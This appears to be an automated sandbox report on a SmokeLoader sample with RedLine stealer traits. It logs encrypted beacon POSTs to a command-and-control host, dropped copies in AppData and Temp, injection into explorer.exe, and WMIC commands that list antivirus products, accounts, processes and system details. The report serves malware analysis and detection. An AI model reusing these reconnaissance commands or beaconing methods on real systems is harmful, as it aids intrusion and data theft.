                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      19192.168.2.44978923.145.40.1624432580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-03 10:30:14 UTC286OUTPOST /search.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: https://osmeijnmqbad.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 109
                                                                      Host: calvinandhalls.com
                                                                      2024-10-03 10:30:14 UTC109OUTData Raw: 72 19 83 ce fc 7a 1d 8f 6d 83 ee 1b 4d 81 19 2d dc f3 b6 da 61 7c 36 83 06 02 b4 9a ef a1 41 9f 7c 97 ba 80 00 f1 a9 88 86 0e d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6b 34 01 83 b6 25 93 3c 32 a9 65 e1 d2 fe 51 00 be 76 62 b5 25 c5 93 3b 3d b8 6a 01 20 c8 ea d4 2c be a9 07 02 86 d4
                                                                      Data Ascii: rzmM-a|6A| )6IP g3iqH[CLk4%<2eQvb%;=j ,
                                                                      2024-10-03 10:30:15 UTC285INHTTP/1.1 404 Not Found
                                                                      Date: Thu, 03 Oct 2024 10:30:15 GMT
                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      Content-Length: 7
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      2024-10-03 10:30:15 UTC7INData Raw: 03 00 00 00 1e 0d af
                                                                      Data Ascii:


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      20192.168.2.44979123.145.40.1624432580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-03 10:30:31 UTC285OUTPOST /search.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: https://esjrsvtmrom.net/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 109
                                                                      Host: calvinandhalls.com
                                                                      2024-10-03 10:30:31 UTC109OUTData Raw: 72 19 83 ce fc 7a 1d 8f 6d 83 ee 1b 4d 81 19 2d dc f3 b6 da 61 7c 36 83 06 02 b4 9a ef a1 41 9f 7c 97 ba 80 00 f1 a9 88 86 0e d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6b 34 01 83 b6 25 93 3c 32 a9 65 e1 d2 fe 51 00 be 76 62 b5 25 c5 93 3b 3d b8 6a 01 20 c8 ea d4 2c be a9 07 02 86 d4
                                                                      Data Ascii: rzmM-a|6A| )6IP g3iqH[CLk4%<2eQvb%;=j ,
                                                                      2024-10-03 10:30:32 UTC285INHTTP/1.1 404 Not Found
                                                                      Date: Thu, 03 Oct 2024 10:30:32 GMT
                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      Content-Length: 7
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      2024-10-03 10:30:32 UTC7INData Raw: 03 00 00 00 1e 0d af
                                                                      Data Ascii:


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      21192.168.2.44979323.145.40.1624432580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-03 10:30:49 UTC289OUTPOST /search.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: https://yfclovtrctueuif.com/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 109
                                                                      Host: calvinandhalls.com
                                                                      2024-10-03 10:30:49 UTC109OUTData Raw: 72 19 83 ce fc 7a 1d 8f 6d 83 ee 1b 4d 81 19 2d dc f3 b6 da 61 7c 36 83 06 02 b4 9a ef a1 41 9f 7c 97 ba 80 00 f1 a9 88 86 0e d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6b 34 01 83 b6 25 93 3c 32 a9 65 e1 d2 fe 51 00 be 76 62 b5 25 c5 93 3b 3d b8 6a 01 20 c8 ea d4 2c be a9 07 02 86 d4
                                                                      Data Ascii: rzmM-a|6A| )6IP g3iqH[CLk4%<2eQvb%;=j ,
                                                                      2024-10-03 10:30:49 UTC285INHTTP/1.1 404 Not Found
                                                                      Date: Thu, 03 Oct 2024 10:30:49 GMT
                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      Content-Length: 7
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      2024-10-03 10:30:49 UTC7INData Raw: 03 00 00 00 1e 0d af
                                                                      Data Ascii:


                                                                      Click to jump to process

                                                                      Click to jump to process

                                                                      Click to dive into process behavior distribution

                                                                      Click to jump to process

                                                                      Target ID:0
                                                                      Start time:06:26:58
                                                                      Start date:03/10/2024
                                                                      Path:C:\Users\user\Desktop\veEGy9FijY.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\veEGy9FijY.exe"
                                                                      Imagebase:0x400000
                                                                      File size:384'512 bytes
                                                                      MD5 hash:43DA422957B397E2805362661AB3FD4A
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1737221336.0000000002731000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1737221336.0000000002731000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1737075127.00000000025C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1737075127.00000000025C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1737041120.00000000025B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1737299923.000000000276D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:1
                                                                      Start time:06:27:04
                                                                      Start date:03/10/2024
                                                                      Path:C:\Windows\explorer.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\Explorer.EXE
                                                                      Imagebase:0x7ff72b770000
                                                                      File size:5'141'208 bytes
                                                                      MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      Target ID:5
                                                                      Start time:06:27:23
                                                                      Start date:03/10/2024
                                                                      Path:C:\Users\user\AppData\Roaming\haevsid
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\AppData\Roaming\haevsid
                                                                      Imagebase:0x400000
                                                                      File size:384'512 bytes
                                                                      MD5 hash:43DA422957B397E2805362661AB3FD4A
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.1970758383.000000000273D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.1970636946.0000000002710000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.1970636946.0000000002710000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000005.00000002.1970451441.00000000025B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.1970849868.00000000040E1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.1970849868.00000000040E1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Avira
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      • Detection: 34%, ReversingLabs
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:7
                                                                      Start time:06:28:15
                                                                      Start date:03/10/2024
                                                                      Path:C:\Users\user\AppData\Local\Temp\38E5.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\AppData\Local\Temp\38E5.exe
                                                                      Imagebase:0x400000
                                                                      File size:401'920 bytes
                                                                      MD5 hash:B39D75B20F14D8DFCB2325D7082CB2B9
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000007.00000002.2487345753.0000000000761000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000007.00000002.2487345753.0000000000761000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000007.00000003.2436031389.0000000000730000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000007.00000002.2487596772.000000000083E000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000007.00000002.2487198589.0000000000730000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000007.00000002.2487198589.0000000000730000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000007.00000002.2487104825.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Avira
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:9
                                                                      Start time:06:28:41
                                                                      Start date:03/10/2024
                                                                      Path:C:\Users\user\AppData\Roaming\uievsid
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\AppData\Roaming\uievsid
                                                                      Imagebase:0x400000
                                                                      File size:401'920 bytes
                                                                      MD5 hash:B39D75B20F14D8DFCB2325D7082CB2B9
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000009.00000002.2753538015.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000009.00000002.2753825516.0000000000630000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000009.00000002.2753825516.0000000000630000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000009.00000003.2699654261.0000000000630000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000009.00000002.2754697355.00000000006AE000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000009.00000002.2754187003.0000000000651000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000009.00000002.2754187003.0000000000651000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Avira
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:10
                                                                      Start time:06:28:54
                                                                      Start date:03/10/2024
                                                                      Path:C:\Users\user\AppData\Local\Temp\BC8F.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Users\user\AppData\Local\Temp\BC8F.exe
                                                                      Imagebase:0x7ff6aab40000
                                                                      File size:78'336 bytes
                                                                      MD5 hash:69C7186C5393D5E94294E39DA1D4D830
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      • Detection: 37%, ReversingLabs
                                                                      Reputation:low
                                                                      Has exited:false

                                                                      Target ID:11
                                                                      Start time:06:28:55
                                                                      Start date:03/10/2024
                                                                      Path:C:\Windows\System32\msiexec.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\msiexec.exe /V
                                                                      Imagebase:0x7ff65bd10000
                                                                      File size:69'632 bytes
                                                                      MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      Target ID:13
                                                                      Start time:06:28:58
                                                                      Start date:03/10/2024
                                                                      Path:C:\Windows\SysWOW64\explorer.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                      Imagebase:0xf10000
                                                                      File size:4'514'184 bytes
                                                                      MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      Target ID:14
                                                                      Start time:06:28:59
                                                                      Start date:03/10/2024
                                                                      Path:C:\Windows\explorer.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\explorer.exe
                                                                      Imagebase:0x7ff72b770000
                                                                      File size:5'141'208 bytes
                                                                      MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:15
                                                                      Start time:06:29:00
                                                                      Start date:03/10/2024
                                                                      Path:C:\Windows\SysWOW64\explorer.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                      Imagebase:0xf10000
                                                                      File size:4'514'184 bytes
                                                                      MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 0000000F.00000002.4138340959.0000000000B41000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:moderate
                                                                      Has exited:false

                                                                      Target ID:16
                                                                      Start time:06:29:01
                                                                      Start date:03/10/2024
                                                                      Path:C:\Windows\explorer.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\explorer.exe
                                                                      Imagebase:0x7ff72b770000
                                                                      File size:5'141'208 bytes
                                                                      MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 00000010.00000002.4137644244.0000000000111000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      Target ID:17
                                                                      Start time:06:29:02
                                                                      Start date:03/10/2024
                                                                      Path:C:\Windows\SysWOW64\explorer.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                      Imagebase:0xf10000
                                                                      File size:4'514'184 bytes
                                                                      MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:false

                                                                      Target ID:18
                                                                      Start time:06:29:03
                                                                      Start date:03/10/2024
                                                                      Path:C:\Windows\explorer.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\explorer.exe
                                                                      Imagebase:0x7ff72b770000
                                                                      File size:5'141'208 bytes
                                                                      MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      Target ID:19
                                                                      Start time:06:29:13
                                                                      Start date:03/10/2024
                                                                      Path:C:\Windows\System32\cmd.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:cmd
                                                                      Imagebase:0x7ff77fe60000
                                                                      File size:289'792 bytes
                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      Target ID:20
                                                                      Start time:06:29:13
                                                                      Start date:03/10/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:false

                                                                      Target ID:21
                                                                      Start time:06:29:14
                                                                      Start date:03/10/2024
                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv
                                                                      Imagebase:0x7ff7c1820000
                                                                      File size:576'000 bytes
                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:22
                                                                      Start time:06:29:16
                                                                      Start date:03/10/2024
                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv
                                                                      Imagebase:0x7ff7c1820000
                                                                      File size:576'000 bytes
                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:23
                                                                      Start time:06:29:17
                                                                      Start date:03/10/2024
                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv
                                                                      Imagebase:0x7ff7c1820000
                                                                      File size:576'000 bytes
                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:24
                                                                      Start time:06:29:20
                                                                      Start date:03/10/2024
                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv
                                                                      Imagebase:0x7ff7c1820000
                                                                      File size:576'000 bytes
                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:25
                                                                      Start time:06:29:22
                                                                      Start date:03/10/2024
                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv
                                                                      Imagebase:0x7ff7c1820000
                                                                      File size:576'000 bytes
                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:26
                                                                      Start time:06:29:27
                                                                      Start date:03/10/2024
                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv
                                                                      Imagebase:0x7ff7c1820000
                                                                      File size:576'000 bytes
                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:27
                                                                      Start time:06:29:30
                                                                      Start date:03/10/2024
                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv
                                                                      Imagebase:0x7ff7c1820000
                                                                      File size:576'000 bytes
                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:28
                                                                      Start time:06:29:32
                                                                      Start date:03/10/2024
                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv
                                                                      Imagebase:0x7ff7c1820000
                                                                      File size:576'000 bytes
                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:29
                                                                      Start time:06:29:35
                                                                      Start date:03/10/2024
                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv
                                                                      Imagebase:0x7ff7c1820000
                                                                      File size:576'000 bytes
                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:30
                                                                      Start time:06:29:43
                                                                      Start date:03/10/2024
                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv
                                                                      Imagebase:0x7ff7c1820000
                                                                      File size:576'000 bytes
                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:31
                                                                      Start time:06:29:46
                                                                      Start date:03/10/2024
                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv
                                                                      Imagebase:0x7ff7c1820000
                                                                      File size:576'000 bytes
                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:32
                                                                      Start time:06:29:53
                                                                      Start date:03/10/2024
                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv
                                                                      Imagebase:0x7ff7c1820000
                                                                      File size:576'000 bytes
                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:33
                                                                      Start time:06:30:01
                                                                      Start date:03/10/2024
                                                                      Path:C:\Users\user\AppData\Roaming\uievsid
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\AppData\Roaming\uievsid
                                                                      Imagebase:0x400000
                                                                      File size:401'920 bytes
                                                                      MD5 hash:B39D75B20F14D8DFCB2325D7082CB2B9
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000021.00000002.4141842433.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000021.00000003.3713654761.0000000000630000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000021.00000002.4143586325.00000000006B2000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                      Has exited:false

                                                                      Target ID:34
                                                                      Start time:06:30:02
                                                                      Start date:03/10/2024
                                                                      Path:C:\Users\user\AppData\Roaming\haevsid
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\AppData\Roaming\haevsid
                                                                      Imagebase:0x400000
                                                                      File size:384'512 bytes
                                                                      MD5 hash:43DA422957B397E2805362661AB3FD4A
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000022.00000002.3707478995.0000000002731000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000022.00000002.3707478995.0000000002731000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000022.00000002.3707763574.00000000027CF000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000022.00000002.3707006171.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000022.00000002.3707296343.0000000002710000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000022.00000002.3707296343.0000000002710000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                      Has exited:true

                                                                      Target ID:35
                                                                      Start time:06:30:06
                                                                      Start date:03/10/2024
                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv
                                                                      Imagebase:0x7ff71e800000
                                                                      File size:576'000 bytes
